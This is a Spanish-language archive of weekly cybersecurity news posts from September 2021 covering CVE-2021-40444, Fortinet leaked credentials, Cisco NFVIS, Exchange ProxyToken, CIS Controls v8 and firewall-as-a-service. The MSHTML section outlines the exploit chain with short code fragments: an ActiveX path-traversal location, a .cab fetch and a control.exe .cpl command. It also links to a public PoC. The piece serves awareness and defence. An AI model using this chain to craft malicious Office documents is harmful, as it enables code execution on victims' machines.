Archivo mensual: Septiembre 2021

Esta semana en ciberseguridad – Septiembre semana 3

CVE-2021-40444 – Microsoft publicó el parche para MSHTML

Microsoft publicó la actualización KB5005565 para vulnerabilidad Zero-Day CVE-2021-40444 crítica en el motor de renderizado MSHTML. Esta vulnerabilidad permite la ejecución de comandos en la máquina de la víctima cuando esta abre un documento especialmente diseñado y hace clic en “Habilitar contenido” para deshabilitar la función Vista protegida de Microsoft Office.

Les dejamos un resumen de cómo funciona el exploit y en las fuentes algunos link para generar algunas pruebas de concepto de este.

Funcionamiento del exploit
1. El documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
2. El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX:

ActiveXObjectVAR[‘Script’][‘location’] = ‘.cpl:../../../AppData/Local/Temp/Low/championship.inf’

3. El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante que contiene una DLL maliciosa con extension .inf:

XMLHttpRopen[‘call’](XMLHttpR, ‘GET’, ‘http://127.0.0.1/test.cab’, ![]).

4. El código del sitio web ejecuta el archivo .inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl:

../../../AppData/Local/Temp/championship.inf.

5. La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
6. El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el Shell Preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro.

FUENTE: (1) https://blog.segu-info.com.ar/2021/09/microsoft-publica-el-parche-para-el-0.html
(2) https://github.com/lockedbyte/CVE-2021-40444

Microsoft publicó su Update de Seguridad de Septiembre

CSIRT – El equpo de respuesta ante incidentes de Seguridad Informática del Gobierno de Chile, publicó esta semana las recomendaciones sobre 66 vulnerabilidades informadas por Microsoft en su Update Tuesday de Septiembre.

En la fuente les dejamos el inserto de Microsoft.

FUENTE: https://msrc.microsoft.com/update-guide/releaseNote/2021-Sepnk

v8 Controles CIS

Aunque no de esta semana, hoy queremos recordar el cambio de version de los Controles CIS.

El mes de Mayo del 2021, el Centro for Internet Security (CIS) lanzó oficialmente la versión 8 de los controles CIS, que se mejoró para mantenerse al día con la tecnología imperante en nuestros días y la creciente evolución de las amenazas. La pandemia cambió muchas cosas y esta nueva version de los controles CIS ahora incluye tecnologías móviles y cloud. tanto como un nuevo control “Service Provider Management” que da orientación de como las empresas pueden administrar sus servicios en nube.

Enfoque basado en tareas independientes de quien ejecuta el control.
Dado que las redes básicamente no tienen fronteras, lo que significa que ya no hay una red cerrada y centralizada donde residen todos los puntos finales, los controles ahora están organizados por actividad frente a cómo se administran las cosas.

Los esfuerzos para simplificar los controles y organizarlos por actividad dieron como resultado menos controles y menos salvaguardas (anteriormente subcontroles). Ahora hay 18 controles de nivel superior y 153 salvaguardas, distribuidos entre los tres Grupos de Implementación (GI).

Higiene basica
CIS Controls v8 define oficialmente IG1 cómo Higiene Básica y representa un estándar mínimo emergente de seguridad de la información para todas las empresas. IG1 (56 salvaguardas) es un conjunto fundamental de salvaguardas de ciberdefensa que toda empresa debe aplicar para protegerse contra los ataques más frecuentes.

El IG2 (74 salvaguardas adicionales) y el IG3 (23 salvaguardas) se basan en IG anteriores, siendo el IG1 la vía de acceso a los controles y el IG3 que incluye todas las salvaguardas para un total de 153.

El Informe de Investigaciones de Violación de Datos de Verizon (DBIR) de 2021 publicado recientemente ya menciona a CIS Controls v8 y los nuevos grupos de implementación. Verizon identificó un conjunto básico de controles que toda empresa debería implementar independientemente de su tamaño y presupuesto:

  • Control 4: Configuración segura de activos y software empresariales
  • Control 5: Gestión de cuentas
  • Control 6: Gestión del control de acceso
  • Control 14: Concientización sobre seguridad y capacitación en habilidades

Lo nuevo
Como es de costumbre, los cambios se basan en lo realmente importante y los objetivos de los Controles CIS:

  • El Ataque como referencia para la Defensa.
  • Foco en la identificación y priorización de los aspectos más críticos para detener los ataques más relevantes.
  • Salvaguardas viables y aplicables.
  • Controles medibles.

Adicionalmente, la nueva version de los controles CIS se alinean con otros framework o marcos regulatorios de gobierno y gestión. Los cuales hablan de las nuevas tendencias sobre servicios cloud, virtualización, movilidad, externalización y teletrabajo.

FUENTE: https://blog.segu-info.com.ar/2021/05/controles-cis-v8-18-es-el-nuevo-20.html
https://www.cisecurity.org/

Esta semana en ciberseguridad – Septiembre semana 2

Vulnerabilidad Zero-Day de Severidad 8.8/10 en MSHTML está afectando a usuarios de Microsoft Office.

Microsoft ha informado de una vulnerabilidad Zero-Day identificada como CVE-2021-40444, cuya explotación permite la ejecución remota de código malicioso en el sistema operativo de las víctimas. Y, lo que es peor, los ciberdelincuentes ya están utilizando la vulnerabilidad para atacar a los usuarios de Microsoft Office. Por lo tanto, Microsoft recomienda que los administradores de red Windows empleen una solución alternativa temporal hasta que la empresa pueda implementar un parche. Diferentes expertos lograron reproducir el ataque en la última versión de Office 2019/Office 365 en equipos con Windows 10 tratándose de un fallo lógico y realmente peligroso.

En esta ocasión, la vulnerabilidad CVE-2021-40444 se ha catalogado como importante con una severidad de 8.8 sobre 10 afectando a Windows Server desde 2008 hasta 2019, y a los sistemas operativos Windows desde la versión 8 a la 10. Los usuarios más vulnerables a este tipo de ataques son los que operan con cuentas con derechos administrativos.

La vulnerabilidad está en MSHTML, el motor de Internet Explorer y, aunque ya son pocos los que utilizan IE (incluso Microsoft recomienda encarecidamente cambiarse a su nuevo navegador, Edge), el viejo navegador sigue siendo parte de los sistemas operativos modernos y algunos otros programas utilizan este motor para gestionar el contenido web. En particular, las aplicaciones de Microsoft como Word y PowerPoint dependen de él.

Cómo explotan los atacantes la CVE-2021-40444
Los ataques aparecen como controles ActiveX maliciosos incrustados en documentos de Microsoft Office. Estos controles permiten la ejecución de código arbitrario; lo más probable es que los documentos lleguen como archivos adjuntos en mensajes de correo electrónico. Como con cualquier documento adjunto, los atacantes tienen que persuadir a las víctimas para que abran el archivo.

En teoría, Microsoft Office gestiona los documentos recibidos por Internet en Vista protegida o mediante Protección de aplicaciones para Office (Application Guard for Office), que pueden evitar un ataque de la CVE-2021-40444. Sin embargo, los usuarios podrían hacer clic en el botón de Habilitar edición sin pensarlo y desarmar los mecanismos de seguridad de Microsoft.

Cómo proteger a tu empresa contra la CVE-2021-40444
Microsoft ha prometido investigar y, si fuera necesario, liberar un parche oficial. Dicho esto, no esperamos que este parche esté listo antes del 14 de septiembre, el próximo martes de Parches. En circunstancias normales, la empresa no anunciaría una vulnerabilidad antes de liberar la solución, pero dado que los ciberdelincuentes ya están explotando la CVE-2021-40444, Microsoft recomienda emplear un método alternativo de inmediato.

Esta alternativa consiste en prohibir la instalación de nuevos controles ActiveX. Esto lo puedes hacer al añadir unas cuantas claves al registro del sistema. Microsoft proporciona información detallada sobre la vulnerabilidad, incluida una sección de alternativas (en la que también puedes aprender cómo deshabilitarla una vez que ya no la necesites). De acuerdo con Microsoft, esta alternativa no debería afectar el desempeño de los controles ActiveX que ya están instalados.

Recomendaciones:

  • Instalar una solución de seguridad a nivel de la puerta de enlace del correo electrónico o mejorar los mecanismos de seguridad estándar de Microsoft Office 365 para proteger el correo corporativo de los ataques.
  • Equipar todos los ordenadores de los empleados con soluciones de seguridad que puedan detectar la explotación de vulnerabilidades.
  • Mantener a los empleados al tanto de las ciberamenazas modernas de manera frecuente y, en particular, recordarles que nunca abran documentos de fuentes no confiables, y que mucho menos activen la edición de documentos a menos que sea absolutamente necesario.

PD: (1) Les dejo un video explicativo en las fuentes y (2) Las recomendaciones de CSIRT

FUENTE: https://www.kaspersky.es/blog/cve-2021-40444-vulnerability-mshtml/25950/
https://www.youtube.com/watch?v=Oz16xte5UeU
https://www.csirt.gob.cl/vulnerabilidades/9vsa21-00488-01/

Lista de IP vulnerables de Fortinet.

Fortinet ha descubierto que un actor malintencionado ha revelado recientemente información y una lista de acceso a 87.000 dispositivos FortiGate SSL-VPN. Estas credenciales se obtuvieron de sistemas que permanecían sin parchear contra FG-IR-18-384 / CVE-2018-13379. Si bien pueden haber sido parcheados desde entonces, si las contraseñas no se restablecieron, siguen siendo vulnerables.

Este listado fue publicados de forma gratuita por ex miembros de la pandilla Babuk quienes quieren comenzar su propio negocio de ransomware, dagnabbit.

Este incidente está relacionado con una antigua vulnerabilidad resuelta en mayo de 2019. En ese momento, Fortinet emitió un aviso de PSIRT y se comunicó directamente con los clientes. Además, Fortinet publicó posteriormente varias publicaciones en blogs corporativos que detallaban este problema, alentando encarecidamente a los clientes a actualizar los dispositivos afectados. Además de avisos, boletines y comunicaciones directas, estos blogs se publicaron en agosto de 2019, julio de 2020, abril de 2021 y nuevamente en junio de 2021.

Fortinet reitera que, si en algún momento su organización estaba ejecutando alguna de las versiones afectadas que se enumeran a continuación, incluso si se han actualizado los dispositivos, también debe realizar el restablecimiento de contraseña de usuario recomendado después de la actualización, según el boletín de atención al cliente y otras advertencias. información. De lo contrario, puede seguir siendo vulnerable después de la actualización si las credenciales de sus usuarios se vieron comprometidas anteriormente.

Recomendaciones
Si estas ejecutando una versión afectada, actualizar a FortiOS 5.4.13, 5.6.14, 6.0.11, o 6.2.8 y superior. Y sigue las siguientes recomendaciones dadas por Fortinet:

  • Desactivar todas las VPN (SSL-VPN o IPSEC) hasta que se hayan realizado los siguientes pasos de corrección.
  • Actualizar inmediatamente los dispositivos afectados a la última versión disponible, como se detalla a continuación.
  • Tratar todas las credenciales como potencialmente comprometidas al realizar un restablecimiento de contraseña en toda la organización.
  • Implementar la autenticación multifactor, que ayudará a mitigar el abuso de cualquier credencial comprometida, tanto ahora como en el futuro.
  • Notificar a los usuarios para exaplicarle el motivo del restablecimiento de la contraseña y supervisar en servicios como HIBP para su dominio. Existe la posibilidad de que, si las contraseñas se han reutilizado para otras cuentas, se puedan utilizar en ataques de relleno de credenciales.

FUENTE: https://blog.segu-info.com.ar/2021/09/lista-de-ip-vulnerables-de-fortinet.html
https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/
https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials

El riesgo que suponen los keyloggers.

Esta semana CSIRT publicó una interesante guía de que es un Keyloggers y que riesgos supone. En las fuentes les dejo donde bajar esta guía.

Los keyloggers son programas o aparatos que registran todo lo que un usuario teclea en su computador o celular. Programas más avanzados pueden registrar lo que copiamos en el portapapeles, llamadas realizadas, datos del GPS o lo grabado por la cámara y el micrófono. Estos programas luego envían la información a los ciberdelincuentes.

FUENTE: https://www.csirt.gob.cl/media/2021/09/Doc.-Landing-KEYLOGGER-2021-.pdf

Esta semana en ciberseguridad – Septiembre semana 1

Vulnerabilidad Critica calificada con un rating CVSS 9.8/10 en Productos Cisco

Este Miércoles 1 de Septiembre, Cisco remedio un error crítico, calificado con un rating CVSS 9.8/10, en su software “Cisco Enterprise NFVIS”, para el cual existe un exploit de prueba de concepto (PoC) disponible públicamente.

Cisco Enterprise NFVIS es un software de infraestructura basado en Linux que ayuda a los proveedores de servicios y otros clientes a implementar funciones de red virtualizadas, como routers virtuales y firewalls, así como aceleración WAN, en dispositivos Cisco compatibles. También proporciona aprovisionamiento automatizado y administración centralizada.

La vulnerabilidad de omisión de autenticación en Enterprise NFV Infrastructure Software (NFVIS) ha sido identificada como CVE-2021-34746 y podría permitir que un atacante remoto no autenticado eludir la autenticación e iniciar sesión en un dispositivo vulnerable como administrador.

“Un atacante podría aprovechar esta vulnerabilidad inyectando parámetros en una solicitud de autenticación”…. “Un exploit exitoso podría permitir al atacante eludir la autenticación e iniciar sesión como administrador en el dispositivo afectado”.

explicó Cisco en su aviso de seguridad.

Si la autenticación TACACS está activada, eres vulnerable
La vulnerabilidad se debe a la validación incompleta de la entrada proporcionada por el usuario que se pasa a una secuencia de comandos de autenticación durante el inicio de sesión. La falla se encuentra en Cisco Enterprise NFVIS Release 4.5.1 si el método de autenticación externa TACACS está configurada (característica presente en la funcionalidad de AAA -autenticación, autorización y contabilidad – del software).

Cisco dijo que las configuraciones que usan RADIUS o autenticación local no se ven afectadas.

Recomendación
No existen alternativas para mitigar esta vulnerabilidad, por lo que la recomendación es actualizar. Los parches para solucionar el error están disponibles en las versiones 4.6.1 y posteriores de Enterprise NFVIS.

Cisco dijo que está al tanto del código de explotación de PoC disponible públicamente, pero que no ha visto ningún exploit malicioso exitoso en este momento.

FUENTE: https://threatpost.com/cisco-patches-critical-authentication-bug-with-public-exploit/169146/

Proxytoken: bypass de autenticación en Microsoft Exchange Server

Está siendo un año especialmente duro para Microsoft en cuanto a vulnerabilidades en sus productos y Exchange es sin duda uno de los principales focos. Si a principios de marzo se publicó Proxylogon, cuatro vulnerabilidades (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) que encadenadas daban lugar a un RCE sin autenticación previa, a principios de agosto nos topamos con Proxyshell, tres vulnerabilidades (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) que nos conseguían lo propio, otro bonito RCE.

Serie de ataques a MS Exchange descubiertos por Orange:

Pues bien, hoy traemos ProxyToken descubierta por Le Xuan Tuyen de VNPT ISC en marzo de 2021 y solucionada por Microsoft en los parches acumulativos de julio, esta vez una sola vulnerabilidad con CVE-2021-33766 y por la que “un atacante no autenticado puede realizar acciones de configuración en los buzones de correo que pertenecen a usuarios arbitrarios”. Y lo peor, su explotación es trivial.

Microsoft Exchange crea dos sitios en IIS:

  • Uno es el sitio web predeterminado, que escucha en los puertos 80 para HTTP y 443 para HTTPS. Este es el sitio al que se conectan todos los clientes para acceder a la web (OWA, ECP) y para servicios web externos. Es decir, es el front-end.
  • El otro sitio se llama “Exchange Back End” y escucha en los puertos 81 para HTTP y 444 para HTTPS.

El sitio web de front-end es principalmente un proxy para el back-end. Para permitir el acceso que requiere autenticación de formularios, la interfaz sirve páginas como /owa/auth/logon.aspx. Para todas las solicitudes posteriores a la autenticación, la función principal del front-end es volver a empaquetar las solicitudes y enviarlas a los end-points correspondientes en el back-end. Luego, recopila las respuestas de dicho back-end y las reenvía al cliente.

Sigue este link para algunos ejemplos específicos.
https://www.hackplayers.com/2021/09/proxytoken-un-bypass-de-autenticacion-de-exchange.html

FUENTE: https://threatpost.com/microsoft-exchange-proxytoken-email/169030/
https://www.hackplayers.com/2021/09/proxytoken-un-bypass-de-autenticacion-de-exchange.html

¿Que es un Firewall as a service (FWaaS) ?

El Firewall as a Services o Firewall como servicio “FWaaS“, se construye y se ofrece desde la nube. Cuando un dispositivo o una aplicación se conecta a un servicio FWaaS a través de Internet, automáticamente se le aplican reglas de dominio, filtrado URL y otras medidas de seguridad que habitualmente utilizan los cortafuegos físicos, configurándose en este sentido en función de las necesidades.

El objetivo, es que gracias a este servicio de seguridad, las compañías puedan dejar de depender de hardware que, en un momento determinado puede quedar obsoleto, reducir la inversión inicial en tecnologías de seguridad y facilitar la extensión del firewall a todo tipo de ubicaciones.

Entonces, un usuario o una aplicación se conecta al FWaaS a través de Internet y el servicio aplica reglas de dominio, filtrado URL y otras medidas de seguridad que utilizan los dispositivos de firewall físicos. La idea es reemplazar la multitud de firewalls de hardware que necesitaría para proteger todo el tráfico de la empresa desde todos los diferentes sitios operativos con conexiones seguras de Internet al servicio.

¿Es mejor un FWaaS que un Firewall tradicional?
En realidad, salvo el componente cloud, en poco se diferencia un FWaaS con respecto de ese firewall físico que podamos instalar en nuestro DC, de hecho, que el FWaaS haya crecido en popularidad no ha impactado demasiado en la venta de dispositivos dedicados y especialmente en empresas de tamaño medio que no suelen contar con muchas ubicaciones, estos dispositivos siguen siendo una apuesta segura.

En algunos aspectos sigue siendo más interesante apostar por una inversión inicial, pero, a causa de la longevidad de los FW tradicionales se va diluyendo rápidamente con el paso del tiempo, al de un servicio que vamos a tener que seguir pagando mes a mes. Por otro lado, al ser dispositivos on-premises, pueden prometernos una latencia inferior a la que vamos a encontrar en la nube.

Dicho esto y tal y como hemos dicho anteriormente, la dispersión de los trabajadores ha provocado que, en los últimos meses, la adopción de servicios del tipo FWaaS no paren de crecer. Hablamos de Firewall que virtualmente pueden proteger cualquier tipo de conexión, desde cualquier ubicación remota.

En este sentido y tal y como apunta Gartner, de mantenerse la actual tendencia de teletrabajo, el mercado del FWaaS podría crecer desde los 251 millones de dólares actuales, hasta los 2.600 millones de dólares para el año 2025. Eso daría a FWaaS una cuota del 21% del mercado, en menos de cinco años.

¿Cómo funciona FWaaS exactamente?
Es conceptualmente bastante simple: hace precisamente las mismas cosas que hace un firewall local, simplemente las hace de forma remota, ya sea desde un punto de presencia físico en un centro de datos en algún lugar o en la nube. La ubicación precisa de donde ocurre la carga de trabajo del firewall varía según el proveedor.

También vale la pena señalar que los proveedores de redes a menudo incluyen FWaaS con SD-WAN o simplemente se usa en conjunto con otra oferta de SD-WAN. Se convierte en otra conexión que la SD-WAN administra y proporciona protección de firewall administrada de forma centralizada.

¿Cómo se despliega?
Es considerablemente más fácil que implementar una cantidad sustancial de dispositivos de hardware en numerosas sucursales, pero tampoco es lo más simple del mundo, según Adam Hils, director senior de investigación de Gartner.

“Las organizaciones deben obtener algún tipo de comprensión de qué tipo de acceso necesitan en cada sucursal y configurar el firewall”…. “Esto puede implicar múltiples configuraciones, pero, de nuevo, no es tan complejo como colocar miles de firewalls físicos en una red y tener que configurarlos”.

Adam Hils, director senior de investigación de Gartner.

¿Los firewalls en la nube y FWaaS son lo mismo?
El firewall en la nube es un término de marketing y, según el gerente de investigación de IDC, Chris Rodríguez, no es particularmente útil. “Yo advierto contra el firewall en la nube porque es confuso. ¿Es un firewall en la nube o un firewall que protege una red en la nube?” dijo. Entonces, la respuesta corta es firewall en la nube y FWaaS no son necesariamente lo mismo.

¿Cuáles son las desventajas de FWaaS?
Desde el punto de vista de opex, FWaaS puede ser costoso y no se vuelve más barato con el tiempo como lo haría un grupo de firewalls físicos. Por otro lado, existe el problema de los pequeños retrasos en la transmisión y latencia a medida que el tráfico se filtra a través del FWaaS.

“Puede haber cierta latencia porque tienes que enviar el tráfico de usuarios a través de esa nube y hacia donde sea que se dirija”, si, por ejemplo, el punto de presencia más cercano de un proveedor de FWaaS está inactivo, los tiempos de ida y vuelta para las conexiones que usaban ese punto serían sustancialmente más largos.

dijo Hils

¿Qué pasará con los dispositivos de firewall tradicionales?
Posiblemente nada. Los firewall físicos siguen siendo bastante populares, especialmente para empresas sin muchas ubicaciones diferentes y sin muchos trabajadores remotos. Incluso tienen algunas ventajas sobre FWaaS, como diferentes perfiles de costos. Los firewalls locales son un gasto de capital inicial, pero tienden a ser más baratos con el tiempo. También tienen menor latencia.

¿Por qué los FWaaS cobran relevancia ahora?
La pandemia y el aumento concomitante del trabajo remoto dificultaron las cosas para las empresas que necesitaban que las conexiones de sus empleados estuvieran protegidas en todo momento. FWaaS puede proteger las conexiones provenientes de cualquier lugar, desde una sucursal o incluso desde el estudio de un trabajador remoto.

Gartner estima que los FWaaS pasaran de una industria de U$S 251 millones a aproximadamente U$S 2.6 mil millones para 2025, suponiendo que continúen las tendencias actuales de trabajo remoto. Eso le daría a FWaaS una participación del 21% del mercado de firewall de aproximadamente U$S 12 mil millones en menos de cinco años. La mayor parte del crecimiento más rápido se ha producido en América del Norte y Europa.

FUENTE: https://www.networkworld.com/article/3631055/what-is-firewall-as-a-service.html?nsdr=true